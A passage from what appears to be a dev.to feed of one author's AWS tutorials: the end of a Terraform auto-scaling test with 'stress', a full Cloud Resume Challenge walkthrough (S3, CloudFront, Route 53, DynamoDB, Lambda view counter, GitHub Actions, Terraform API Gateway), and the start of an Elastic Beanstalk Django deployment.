&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvnyrcu08j34os4y16iwz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvnyrcu08j34os4y16iwz.png" alt="Image description" width="800" height="273"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And an EC2 instance is live&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fou2fubxl7p9affc0fwbk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fou2fubxl7p9affc0fwbk.png" alt="Image description" width="800" height="110"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Testing
&lt;/h2&gt;

&lt;p&gt;I edited the EC2 user data script to install "stress" so once the instance, I can test the ASG automatically by driving up the CPU usage for a minute, and then stopping.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# EC2 User Data Script
data "template_file" "userdata" {
  template = &amp;lt;&amp;lt;-EOF
              #!/bin/bash
              yum update -y
              yum install -y epel-release
              yum install -y stress
              yum install -y httpd
              systemctl start httpd
              systemctl enable httpd
              systemctl enable amazon-ssm-agent
              systemctl start amazon-ssm-agent
              echo "Hello World from $(hostname -f)" &amp;gt; /var/www/html/index.html
              # Run stress for 1 minute to simulate high CPU usage
              stress --cpu 1 --timeout 60
            EOF
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Another way to do this, is to SSH directly into your EC2 instance. To do this, we would have to make sure the instances have access to the internet from the private subnets.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Elastic IP for NAT Gateway
resource "aws_eip" "nat_eip" {
  vpc = true
}

# NAT Gateway in Public Subnet
resource "aws_nat_gateway" "nat_gw" {
  allocation_id = aws_eip.nat_eip.id
  subnet_id     = aws_subnet.public_1.id
}

# Route Table for Private Subnets
resource "aws_route_table" "private" {
  vpc_id = aws_vpc.example.id

  route {
    cidr_block = "0.0.0.0/0"
    gateway_id = aws_nat_gateway.nat_gw.id
  }
}

# Route Table Associations for Private Subnets
resource "aws_route_table_association" "private_1" {
  subnet_id      = aws_subnet.private_1.id
  route_table_id = aws_route_table.private.id
}

resource "aws_route_table_association" "private_2" {
  subnet_id      = aws_subnet.private_2.id
  route_table_id = aws_route_table.private.id
}

resource "aws_route_table_association" "private_3" {
  subnet_id      = aws_subnet.private_3.id
  route_table_id = aws_route_table.private.id
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By adding a NAT Gateway and updating the route table for the private subnets, we enable instances in the private subnets to access the internet for outbound traffic while remaining protected from inbound internet traffic.&lt;/p&gt;

&lt;p&gt;Now running the terraform apply will update our resources. &lt;/p&gt;

&lt;p&gt;Monitoring the CloudWatch Alarms, we see that the CPU usage shoots up right away, triggering the "&lt;strong&gt;high_cpu_utilization&lt;/strong&gt;" alarm because of the script we assign the EC2 instances&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh3gks887aortmnicskuk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh3gks887aortmnicskuk.png" alt="Image description" width="800" height="400"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And here we see that a second EC2 instance is created by the ASG&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fak6bv4dkok46h6fown3p.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fak6bv4dkok46h6fown3p.png" alt="Image description" width="800" height="140"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once the stress command is timed-out after 300 seconds, the CPU usage drops down below 20% and triggers the "&lt;strong&gt;low_cpu_utilization&lt;/strong&gt;" alarm&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F09xzs0sus53kh4ivo0sp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F09xzs0sus53kh4ivo0sp.png" alt="Image description" width="800" height="581"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And then the ASG terminates the us-east-1c EC2 instance, leaving only the instance in us-east-1a&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomvcn1s1rlexew74r7ez.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomvcn1s1rlexew74r7ez.png" alt="Image description" width="800" height="127"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And that's it for this project! We were able to successfully use Terraform to create an entire AWS Auto-Scaling Web Server architecture and test it ourselves. &lt;/p&gt;

&lt;p&gt;Here is the Github &lt;a href="https://github.com/aktran321/AutoScalingWebServer" rel="noopener noreferrer"&gt;repo&lt;/a&gt; if you want to try it out for yourself.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt; One thing I wasn't able to do yet, was ssh into the EC2 instances to manually test them, but I kept getting timed out.This is why I scripted the instances to run "stress" automatically on their creation. &lt;/p&gt;

</description>
    </item>
    <item>
      <title>AWS Cloud Resume Challenge</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Mon, 08 Jul 2024 11:44:07 +0000</pubDate>
      <link>https://dev.to/aktran321/aws-cloud-resume-challenge-37md</link>
      <guid>https://dev.to/aktran321/aws-cloud-resume-challenge-37md</guid>
      <description>&lt;h1&gt;
  
  
  Table of Contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;1. Intro&lt;/li&gt;
&lt;li&gt;2. Project Initialization&lt;/li&gt;
&lt;li&gt;3. S3&lt;/li&gt;
&lt;li&gt;4. CloudFront&lt;/li&gt;
&lt;li&gt;5. Route 53&lt;/li&gt;
&lt;li&gt;6. View Counter&lt;/li&gt;
&lt;li&gt;7. DynamoDB&lt;/li&gt;
&lt;li&gt;8. Lambda&lt;/li&gt;
&lt;li&gt;9. Javascript&lt;/li&gt;
&lt;li&gt;10. CI/CD with Github Actions&lt;/li&gt;
&lt;li&gt;11. Infrastructure as Code with Terraform&lt;/li&gt;
&lt;li&gt;12. Conclusion&lt;/li&gt;
&lt;li&gt;13. Edits&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  1. Intro
&lt;/h2&gt;

&lt;p&gt;A few days ago, I decided to take on the Cloud Resume Challenge. This is a great way to expose yourself to multiple AWS Services within a fun project. I'll be documenting how I deployed the project and what I learned along the way. If you're deciding to take on the resume challenge, then hopefully you can use this as resource to get started. Now, lets begin.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Project Initialization
&lt;/h2&gt;

&lt;p&gt;Setup a project environment and configure a git repo along with it. This will first include a frontend directory with your index.html, script.js, and styles.css.&lt;/p&gt;

&lt;p&gt;If you want this done quickly, you could copy and paste your resume into ChatGPT and have it provide you with the 3 files to create a simple static website.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. S3
&lt;/h2&gt;

&lt;p&gt;Create an AWS account. Navigate to the S3 service and create a bucket. The name you choose for your bucket should be unique to your region. Once created, upload your files to the S3 bucket. &lt;/p&gt;

&lt;h2&gt;
  
  
  4. CloudFront
&lt;/h2&gt;

&lt;p&gt;S3 will only host your static website over the HTTP protocol. To use HTTPS, you will have to serve your content over &lt;strong&gt;CloudFront&lt;/strong&gt;, a &lt;strong&gt;CDN (Content Delivery Network)&lt;/strong&gt;. Not only will this provide secure access to your website, but it will deliver your content with low latency. CloudFront edge locations are global, and will cache your website to serve it fast and reliably from a client's nearest edge location.&lt;/p&gt;

&lt;p&gt;Navigate to CloudFront from the AWS console and click "&lt;strong&gt;Create Distribution&lt;/strong&gt;". Pick the origin domain (your S3 bucket). If you enabled &lt;strong&gt;Static Website Hosting&lt;/strong&gt; on the S3 bucket, a button will appear recommending you to use the bucket endpoint, but for our purposes since we want CloudFront direct access to the S3 bucket.&lt;/p&gt;

&lt;p&gt;Under "&lt;strong&gt;Origin Access Control&lt;/strong&gt;", check the "&lt;strong&gt;Origin Access Control Setting (recommended)&lt;/strong&gt;". We do this because we only want the bucket accessed by CloudFront and not the public. &lt;/p&gt;

&lt;p&gt;Create a new OAC and select it.&lt;/p&gt;

&lt;p&gt;Click the button that appears and says "&lt;strong&gt;Copy Policy&lt;/strong&gt;".&lt;/p&gt;

&lt;p&gt;In another window, navigate back to your S3 bucket and under the "&lt;strong&gt;Permissions&lt;/strong&gt;" tab paste the policy under the "&lt;strong&gt;Bucket Policy&lt;/strong&gt;" section. &lt;/p&gt;

&lt;p&gt;It should look something like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
        "Version": "2008-10-17",
        "Id": "PolicyForCloudFrontPrivateContent",
        "Statement": [
            {
                "Sid": "AllowCloudFrontServicePrincipal",
                "Effect": "Allow",
                "Principal": {
                    "Service": "cloudfront.amazonaws.com"
                },
                "Action": "s3:GetObject",
                "Resource": "arn:aws:s3:::&amp;lt;Your Bucket Name&amp;gt;/*",
                "Condition": {
                    "StringEquals": {
                      "AWS:SourceArn": "arn:aws:cloudfront::&amp;lt;Some Numbers&amp;gt;:distribution/&amp;lt;Your CloudFront Distribution&amp;gt;"
                    }
                }
            }
        ]
      }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the CloudFront window, finish the configuration by enabling HTTPS under "&lt;strong&gt;Viewer Protocol Policy&lt;/strong&gt;" and finally leave the rest of the options default and create the distribution.&lt;/p&gt;

&lt;p&gt;When the distribution is created, make sure the default root object is the index.html file. At this point, you should be able to open the  &lt;strong&gt;Distribution domain name&lt;/strong&gt; with your resume website up and running. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;IMPORTANT&lt;/strong&gt; You will now have a CloudFront distribution URL. Since your bucket is not public and in our current configuration, you can only access the html, css, and js files from that CloudFront distribution. Your HTML link and script tags will need to be updated. &lt;/p&gt;

&lt;p&gt;For example, my script tag was&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;link rel="stylesheet" href="styles.css"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and changed to&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;link rel="stylesheet" href="https://d2qo85k2yv6bow.cloudfront.net/styles.css"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once you update your link and script tags, re-upload your HTML file. You will also have to create an &lt;strong&gt;Invalidation Request&lt;/strong&gt; in your CloudFront distribution so that it updates its own cache. When you create the request, simply input "&lt;strong&gt;/&lt;/strong&gt;*". This makes sure that CloudFront serves the latest version of your files (if you are constantly making changes and want to see them immediately on the website, then you will have to repeatedly make invalidation requests).&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Route 53
&lt;/h2&gt;

&lt;p&gt;Your next step will be to route your own DNS domain name to the CloudFront distribution. Since I already had a domain name, I only needed to navigate to my hosted zone in Route53 and create an A record, switch on "&lt;strong&gt;alias&lt;/strong&gt;", select the dropdown option "&lt;strong&gt;Alias to CloudFront distribution&lt;/strong&gt;", select my distribution, keep it as a simple routing policy, and save.&lt;/p&gt;

&lt;p&gt;Also, within the CloudFront distribution's settings, you have to request and configure an SSL certificate associated with your domain and attach it.&lt;/p&gt;

&lt;p&gt;And with that, your website should be up and running!&lt;/p&gt;

&lt;h2&gt;
  
  
  6. View Counter
&lt;/h2&gt;

&lt;p&gt;To set up a view counter, we will now have to incorporate a DynamoDB and Lambda as well as write some Javascript for our HTML. The idea is when someone views our resume, the Javascript will send a request to the Lambda function URL. Lambda will be some Python code that retrieves and updates data in the DynamoDB table, and returns the data to your Javascript. &lt;/p&gt;

&lt;h2&gt;
  
  
  7. DynamoDB
&lt;/h2&gt;

&lt;p&gt;Navigate to the DynamoDB service and create a table.&lt;/p&gt;

&lt;p&gt;Go to "&lt;strong&gt;Actions&lt;/strong&gt;"" --&amp;gt; "&lt;strong&gt;Explore Items&lt;/strong&gt;" and create an item.&lt;/p&gt;

&lt;p&gt;Set the id (partition key) value to 1.&lt;/p&gt;

&lt;p&gt;Create a number attribute and label is "views" with a value of 0. &lt;/p&gt;

&lt;h2&gt;
  
  
  8. Lambda
&lt;/h2&gt;

&lt;p&gt;Next, we will create the Lambda function that can retrieve the data from DynamoDB and update it.&lt;/p&gt;

&lt;p&gt;When creating the Lambda function in the AWS console, I chose Python3.12.&lt;/p&gt;

&lt;p&gt;Enable &lt;strong&gt;function URL&lt;/strong&gt; and set the AUTH type to None. Doing so allows your Lambda function to be invoked by anyone that obtains the function URL. I chose to set the Lambda function up this way so I can test the functionality of the Lambda function with my project without setting up API Gateway at the moment.&lt;/p&gt;

&lt;p&gt;Here is my Lambda function code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import json
import boto3

dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("cloud-resume-challenge")

def lambda_handler(event, context):
    try:
        # Get the current view count from DynamoDB
        response = table.get_item(Key={
            "id": "1"
        })
        if 'Item' in response:
            views = int(response["Item"]["views"])
        else:
            views = 0  # Default to 0 if the item doesn't exist

        # Increment the view count
        views += 1

        # Update the view count in DynamoDB
        table.put_item(Item={
            "id": "1",
            "views": views
        })

        # Return the updated view count
        return {
            "statusCode": 200,
            "body": json.dumps({"views": views})
        }

    except Exception as e:
        print(f"Error: {e}")
        return {
            "statusCode": 500,
            "body": json.dumps({"error": str(e)})
        }

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Finally, in the "&lt;strong&gt;Configuration&lt;/strong&gt;" tab, we need an execution role that has permission to invoke the DynamoDB table. To do this, you would navigate to IAM and create a new role. This role will need the "&lt;strong&gt;AmazonDynamoDBFullAccess&lt;/strong&gt;" permission. Once created, attach the role to your Lambda function.&lt;/p&gt;

&lt;h2&gt;
  
  
  9. Javascript
&lt;/h2&gt;

&lt;p&gt;Then, write some code into your script.js file. Something like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async function updateCounter() {
  try {
    let response = await fetch("Lambda Function URL");
    let data = await response.json();
    const counter = document.getElementById("view-count");
    counter.innerText = data.views;
  } catch (error) {
    console.error('Error updating counter:', error);
  }
}

updateCounter();
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The code sends a request to the Lambda function URL, parses it and sets it to the "&lt;strong&gt;data&lt;/strong&gt;" variable. I have a &lt;span&gt; with id="view-count" and set it to data.views, which is the retrieved view count from the Lambda function URL.&lt;/span&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  10. CI/CD with Github Actions
&lt;/h2&gt;

&lt;p&gt;We can create a CI/CD pipeline with Github Actions. Doing so will automatically update our S3 bucket files whenever code changes are pushed to Github. &lt;/p&gt;

&lt;p&gt;To summarize, you have to create a directory "&lt;strong&gt;.github&lt;/strong&gt;" and within it will be another directory "&lt;strong&gt;workflows&lt;/strong&gt;". Create a YAML file inside.&lt;/p&gt;

&lt;p&gt;This is my "&lt;strong&gt;frontend-cicd.yaml&lt;/strong&gt;" file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;on:
  push:
    branches:
    - main

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@master
    - uses: jakejarvis/s3-sync-action@master
      with:
        args: --follow-symlinks --delete
      env:
        AWS_S3_BUCKET: ${{ secrets.AWS_S3_BUCKET }}
        AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
        AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        AWS_REGION: 'us-east-1' #optional: defaults to us-east-1
        SOURCE_DIR: 'frontend' # optional: defaults to entire repository
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Your Github will now have a new action, but you still have to setup your environment variables such as AWS_S3_BUCKET, AWS_ACCESS_KEY_ID, and AWS_SECRET_ACCESS_KEY.&lt;/p&gt;

&lt;p&gt;Within your Github repo, you would have to navigate to Settings → Secrets and variables (under the Security Section on the left side of the screen) → Actions&lt;/p&gt;

&lt;p&gt;These access keys are associated with your AWS user and will need to be retrieved from the AWS console.&lt;/p&gt;

&lt;h2&gt;
  
  
  11. Infrastructure as Code with Terraform
&lt;/h2&gt;

&lt;p&gt;So far, we've been clicking around in the AWS console, setting permissions and configurations for multiple AWS services. It can all get confusing and messy very quickly. Terraform allows us to set up our infrastructure in a code based format. This allows us to roll back configurations through versioning, and easily replicate our setup.&lt;/p&gt;

&lt;p&gt;This was my first time using Terraform. For now, I just used it to create an API Gateway and re-create my Lambda function. So instead of my Javascript hitting the public function URL of my Lambda Function, I can have it hit my API Gateway, which will invoke my Lambda function. API Gateway has much better security, providing:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Authentication and Authorization through IAM, Cognito, API Keys&lt;/li&gt;
&lt;li&gt;Throttling and Rate Limiting&lt;/li&gt;
&lt;li&gt;Private Endpoints&lt;/li&gt;
&lt;li&gt;Input Validation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After downloading Terraform onto my machine, I created a "&lt;strong&gt;terraform&lt;/strong&gt;" folder in the root directory of my project. Then I created two files: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;provider.tf&lt;/li&gt;
&lt;li&gt;main.tf&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here is my provider.tf:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform {
  required_providers {
    aws = {
      version ="&amp;gt;=4.9.0"
      source = "hashicorp/aws"
    }
  }
}
provider "aws" {
  access_key = "*****"
  secret_key = "*****"
  region = "us-east-1"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I've made sure to omit this from my Github using a .gitignore file, since it would expose my AWS user's access key and secret key.&lt;/p&gt;

&lt;p&gt;This file basically configures the provider which Terraform will use. In our case, it is AWS. &lt;/p&gt;

&lt;p&gt;Next the main.tf:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;data "archive_file" "zip_the_python_code" {
  type        = "zip"
  source_file = "${path.module}/aws_lambda/func.py"
  output_path = "${path.module}/aws_lambda/func.zip"
}

resource "aws_lambda_function" "myfunc" {
  filename         = data.archive_file.zip_the_python_code.output_path
  source_code_hash = data.archive_file.zip_the_python_code.output_base64sha256
  function_name    = "myfunc"
  role             = "arn:aws:iam::631242286372:role/service-role/cloud-resume-views-role-bnt3oikr"
  handler          = "func.lambda_handler"
  runtime          = "python3.12"
}

resource "aws_lambda_permission" "apigateway" {
  statement_id  = "AllowAPIGatewayInvoke"
  action        = "lambda:InvokeFunction"
  function_name = aws_lambda_function.myfunc.function_name
  principal     = "apigateway.amazonaws.com"
  source_arn    = "arn:aws:execute-api:us-east-1:${data.aws_caller_identity.current.account_id}:${aws_apigatewayv2_api.http_api.id}/*/GET/views"
}

resource "aws_apigatewayv2_api" "http_api" {
  name          = "views-http-api"
  protocol_type = "HTTP"
}

resource "aws_apigatewayv2_integration" "lambda_integration" {
  api_id             = aws_apigatewayv2_api.http_api.id
  integration_type   = "AWS_PROXY"
  integration_uri    = aws_lambda_function.myfunc.invoke_arn
  integration_method = "POST"
  payload_format_version = "1.0" # Explicitly set payload format version
}

resource "aws_apigatewayv2_route" "default_route" {
  api_id    = aws_apigatewayv2_api.http_api.id
  route_key = "GET /views"
  target    = "integrations/${aws_apigatewayv2_integration.lambda_integration.id}"
}

resource "aws_apigatewayv2_stage" "default_stage" {
  api_id      = aws_apigatewayv2_api.http_api.id
  name        = "$default"
  auto_deploy = true
}

output "http_api_url" {
  value = aws_apigatewayv2_stage.default_stage.invoke_url
}

data "aws_caller_identity" "current" {}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The archive_file data source zips the Python code (func.py) into func.zip. The aws_lambda_function resource creates the Lambda function using this zip file. The aws_lambda_permission resource grants API Gateway permission to invoke the Lambda function. The aws_apigatewayv2_api, aws_apigatewayv2_integration, and aws_apigatewayv2_route resources set up an HTTP API Gateway that integrates with the Lambda function, and aws_apigatewayv2_stage deploys this API. The output block provides the API endpoint URL. Additionally, data "aws_caller_identity" "current" retrieves the AWS account details.&lt;/p&gt;

&lt;p&gt;Before initializing and applying the terraform code, I created another folder called "&lt;strong&gt;aws_lambda&lt;/strong&gt;" and within it created a file func.py. This is where the Lambda function code from earlier is pasted in. &lt;/p&gt;

&lt;p&gt;With that in place, run the commands:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;terraform init&lt;/li&gt;
&lt;li&gt;terraform plan&lt;/li&gt;
&lt;li&gt;terraform apply&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After a few moments, my services and settings were configured in AWS.&lt;/p&gt;

&lt;p&gt;One thing to note with this project, we can update the code for the frontend, commit and push to Github, invalidate the CloudFront cache, and see the changes applied. However, the Lambda function requires the Terraform commands to be executed for the changes to be applied.&lt;/p&gt;

&lt;h2&gt;
  
  
  12. Conclusion
&lt;/h2&gt;

&lt;p&gt;I still have some updates to make with Terraform to configure the rest of the services I am utilizing, but I feel confident about what I've been able to build so far. This challenge has significantly deepened my understanding of AWS, providing me with hands-on experience in managing and automating cloud infrastructure. The skills and knowledge I’ve gained will be invaluable as I continue to build scalable, secure, and efficient cloud architectures in my career. I am excited to further refine my setup and explore additional AWS services and Terraform capabilities.&lt;/p&gt;

&lt;p&gt;And if you want to checkout my project, &lt;a href="//andytran.click"&gt;click here&lt;/a&gt;!&lt;/p&gt;

&lt;h3&gt;
  
  
  13. Edits
&lt;/h3&gt;

&lt;p&gt;The counter has stopped working and produced this error:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Access to fetch at '&lt;a href="https://g6thr4od50.execute-api.us-east-1.amazonaws.com/views" rel="noopener noreferrer"&gt;https://g6thr4od50.execute-api.us-east-1.amazonaws.com/views&lt;/a&gt;' from origin '&lt;a href="https://andytran.click" rel="noopener noreferrer"&gt;https://andytran.click&lt;/a&gt;' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;My browser is sending a request to the API Gateway, which is invoking my Lambda function, but my Lambda function isn't responding with the necessary CORS headers. The browser saw that the response didn't include the Access-Control-Allow-Origin header and blocked the response, resulting in a CORS error.&lt;/p&gt;

&lt;p&gt;So I updated the Lambda function here with this in both return statements:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;"headers": {
                "Content-Type": "application/json",
                "Access-Control-Allow-Origin": "*"
            }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So the updated Lambda function looks like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import json
import boto3

dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("cloud-resume-challenge")

def lambda_handler(event, context):
    try:
        # Get the current view count from DynamoDB
        response = table.get_item(Key={
            "id": "1"
        })
        if 'Item' in response:
            views = int(response["Item"]["views"])
        else:
            views = 0  # Default to 0 if the item doesn't exist

        # Increment the view count
        views += 1

        # Update the view count in DynamoDB
        table.put_item(Item={
            "id": "1",
            "views": views
        })

        # Return the updated view count with headers
        return {
            "statusCode": 200,
            "headers": {
                "Content-Type": "application/json",
                "Access-Control-Allow-Origin": "*"
            },
            "body": json.dumps({"views": views})
        }

    except Exception as e:
        print(f"Error: {e}")
        return {
            "statusCode": 500,
            "headers": {
                "Content-Type": "application/json",
                "Access-Control-Allow-Origin": "*"
            },
            "body": json.dumps({"error": str(e)})
        }

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Add burst/rate limiting to my API Gateway with my main.tf file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_apigatewayv2_stage" "default_stage" {
  api_id      = aws_apigatewayv2_api.http_api.id
  name        = "$default"
  auto_deploy = true

  default_route_settings {
    throttling_burst_limit = 10
    throttling_rate_limit  = 5
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>awschallenge</category>
    </item>
    <item>
      <title>Deploying a Web-app with Elastic Beanstalk</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Mon, 08 Jul 2024 11:43:45 +0000</pubDate>
      <link>https://dev.to/aktran321/deploying-a-web-app-with-elastic-beanstalk-37hb</link>
      <guid>https://dev.to/aktran321/deploying-a-web-app-with-elastic-beanstalk-37hb</guid>
      <description>&lt;p&gt;So a few months ago I made an E-commerce store as a personal project.  I'll be deploying it today (again) with Elastic Beanstalk and documenting the process.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Elastic Beanstalk
&lt;/h2&gt;

&lt;p&gt;For my MacOs machine, I have to install Homebrew. Once installed, run commands:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;brew update&lt;/li&gt;
&lt;li&gt;brew install awsebcli&lt;/li&gt;
&lt;li&gt;eb --version&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Create a .ebextensions folder in the root directory of the Django application and inside it, a django.config file&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;option_settings:
 aws:elasticbeanstalk:container:python:
  WSGIPath: &amp;lt;app name&amp;gt;.wsgi:application
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For me, the  would be replaced with "ecom".&lt;/p&gt;

&lt;p&gt;The name it consistent with this line in my settings.py:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;WSGI_APPLICATION = "ecom.wsgi.application"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since my project is in Django, I have to move to my root directory here,&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fftdjf9p4y5jlks977o8d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fftdjf9p4y5jlks977o8d.png" alt="Root Directory" width="482" height="460"&gt;&lt;/a&gt;&lt;/p&gt;

